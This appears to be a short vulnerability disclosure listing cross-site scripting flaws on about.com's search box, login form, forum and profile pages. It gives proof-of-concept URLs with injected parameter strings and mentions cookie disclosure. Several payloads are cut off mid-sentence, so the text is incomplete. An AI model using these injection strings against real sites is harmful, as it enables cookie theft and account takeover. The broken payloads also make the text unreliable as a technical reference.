About.com Homepage: http://www.about.com Effected files: Search input box fullsearch.htm shortform.htm forum.aspx profile_center.asp posting in the forum ----------------------------------- Search input box xss vuln with cookie disclosure: Works by putting the Screenshots: http://www.youfucktard.com/xsp/about1.jpg http://www.youfucktard.com/xsp/about2.jpg ----------------------------------------- Shortform.htm XSS vuln no filter evasion needed: http://login.about.com/shortform.htm?Error= Screenshots: http://www.youfucktard.com/xsp/about3.jpg --------------------------------------------- Forum.aspx xss vuln. Here we have malformed image tags, as well as empty script tags: PoC: http://forums.about.com/n/pfx/forum.aspx?nav=messages&tsn=">1&tid=1456">">"><"">'>'>'><"">">"><"<"<"<"<""><"<"<'<'&webtag=ab-vgstrategies ------------------------------------------------------ Profile_center.asp xss vuln: http://forums.about.com/dir-app/bbCard/profile_center.asp?webtag=ab-vgstrategies&cType=2&uName=jonne1234">">"><"<"<"&dMode=0&eBtn=0&uid=1574961808 ------------------------------------------------------ Posting in the forum XSS vuln. This time we'll use the allowed tags . For PoC try posting this in the forum:
Screenshots: http://www.youfucktard.com/xsp/about4.jpg http://www.youfucktard.com/xsp/about5.jpg